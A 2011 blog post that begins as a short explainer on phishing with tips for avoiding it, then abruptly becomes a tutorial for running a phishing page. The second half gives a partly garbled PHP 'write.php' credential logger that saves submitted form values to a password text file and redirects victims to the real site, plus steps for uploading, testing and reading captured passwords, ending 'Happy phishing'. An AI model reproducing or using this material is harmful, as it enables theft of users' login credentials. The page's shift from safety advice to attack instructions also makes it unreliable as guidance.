Wednesday, December 07, 2011

What is phishing and how to be safe from phishing ?

What is Phishing ?



                    Phishing is one of the type of hacking . It is a method of acquiring sensitive information such as username, password, bank information etc. Phishing page could be saif as an duplicate page of real one. Its look exactly similar as the real page.But when user enter sensitive information on such phishing page his information is send to the E-mail address provided in the phishing page or you can say the one who created that phishing page. Phishing page is mostly send via mail. Target of phishing are mostly social networking sites like facebook, orkut etc. Also Banks website to acquire credit card details,website like yahoo, gmail are also target of phishing.


    Example of Phishing scams:
Email asking you to login to your locked account to unlock it.
Email carrying a Link to sites like Facebook,yahoo etc and asking you to Login.
Emails containing some Information of your Interest and asking you to Login to Your Account.
 
     How to be safe from phishing ?
Never login to any of your account through link provided in the Email.
Go to real website dont click on any link posted anywhere. such as link posted on your facebook wall by friend or link provided in comments or link to ceratin website on any blog.
Check the URL of website before entering any sensitive information. Because the URL of phishing page is not same as the URL of  real one.
Real gmail page looks like gmail.com while phishing looks different somthing like gmail.anything.com

Create a new file called "write.php" and copy / paste this:


$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.

 Save this file (write.php), and upload it to the subdomain aswell

 test out your website. type in something in your phisher and then go to filemanager and open the password file, what you wrote should be typed here!, you can also access the password file by going to http://www.yourdomain.700megs.com/passwordfile.txt

 If it does not work, you can try to edit the form method from "post" to "get".


Happy phishing

0 comments: